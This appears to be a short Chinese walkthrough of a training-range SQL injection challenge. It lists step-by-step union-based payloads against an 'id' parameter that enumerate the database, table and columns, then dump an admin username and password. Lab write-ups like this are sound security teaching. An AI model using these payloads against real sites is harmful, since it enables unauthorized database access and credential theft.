1:靶场链接: https://hack.zkaq.cn/battle/target?id=485e58d0afa7e4f7https://hack.zkaq.cn/battle/target?id=485e58d0afa7e4f7https://hack.zkaq.cn/battle/target?id=485e58d0afa7e4f7
2:解题过程:
(1):打开传送门,点击"点击查看新闻"发现url出现参数 id = 1,猜测为注入点。
(2):判断字段个数:
注入代码: order by 3 :页面显示异常
order by 2 : 页面显示正常
//判读字段数为2
(3):判断字段是否有回显,及回显位置.
注入语句: id =3534 union select 1,2 --
(4):猜解数据库名
id = 2433 union select 1,database()
数据库名为 maoshe
(5):猜解数据表名:
id=2433 union select 1,table_name from information_schema.tables where table_schema='maoshe'
数据表名为: admin
(6):猜解所有字段:
id=1232 union select 1,(select group_concat(column_name,"~") from information_schem
a.columns where table_schema='maoshe' and table_name='admin')
字段名为:Id ,username, password
(7):获取用户信息:
(select group_concat(id,'--',username,'--',password,'--') from maoshe.admin)
获取用户密码: hellohack 过关!!!